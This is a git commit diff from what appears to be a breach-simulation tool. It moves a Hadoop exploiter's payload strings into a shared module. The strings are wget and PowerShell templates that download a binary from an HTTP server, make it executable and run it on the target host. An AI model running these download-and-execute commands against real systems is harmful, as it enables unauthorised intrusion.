Commands moved to model

2018-11-29 17:43:09 +02:00 · 2018-11-29 17:43:09 +02:00 · db5e5eb453
parent b48cb16088
commit db5e5eb453
2 changed files with 14 additions and 26 deletions
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@ -12,7 +12,7 @@ import posixpath
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
-from infection_monkey.model import MONKEY_ARG, ID_STRING
+from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
 __author__ = 'VakarisZ'
@ -22,25 +22,6 @@ LOG = logging.getLogger(__name__)
 class HadoopExploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']
    HADOOP_PORTS = [["8088", False]]
    # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
    # to download monkey at the same time
    LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
                    "&& wget -O %(monkey_path)s %(http_path)s " \
                    "; chmod +x %(monkey_path)s " \
                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
    """ Command was observed to be unreliable, we use powershell instead
    WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
                      " Update /download /priority high %(http_path)s %(monkey_path)s " \
                      "& %(monkey_path)s %(monkey_type)s %(parameters)s"
    """
    WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
    # How long we have our http server open for downloads in seconds
    DOWNLOAD_TIMEOUT = 60
    # Random string's length that's used for creating unique app name
@ -55,9 +36,6 @@ class HadoopExploiter(WebRCE):
        self.add_vulnerable_urls(urls, True)
        if not self.vulnerable_urls:
            return False
        # We assume hadoop is ran only on 64 bit windows
        if self.host.os['type'] == 'windows':
            self.host.os['machine'] = '64'
        paths = self.get_monkey_paths()
        if not paths:
            return False
@ -91,9 +69,9 @@ class HadoopExploiter(WebRCE):
        # Build command to execute
        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
        if 'linux' in self.host.os['type']:
-            base_command = self.LINUX_COMMAND
+            base_command = HADOOP_LINUX_COMMAND
        else:
-            base_command = self.WINDOWS_COMMAND
+            base_command = HADOOP_WINDOWS_COMMAND
        return base_command % {"monkey_path": path, "http_path": http_path,
                               "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
--- a/monkey/infection_monkey/model/init.py
+++ b/monkey/infection_monkey/model/init.py
@ -28,4 +28,14 @@ CHECK_COMMAND = "echo %s" % ID_STRING
 GET_ARCH_WINDOWS = "wmic os get osarchitecture"
 GET_ARCH_LINUX = "lscpu"
 # All in one commands (upload, change permissions, run)
 HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
 HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
                    "&& wget -O %(monkey_path)s %(http_path)s " \
                    "; chmod +x %(monkey_path)s " \
                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
 DOWNLOAD_TIMEOUT = 300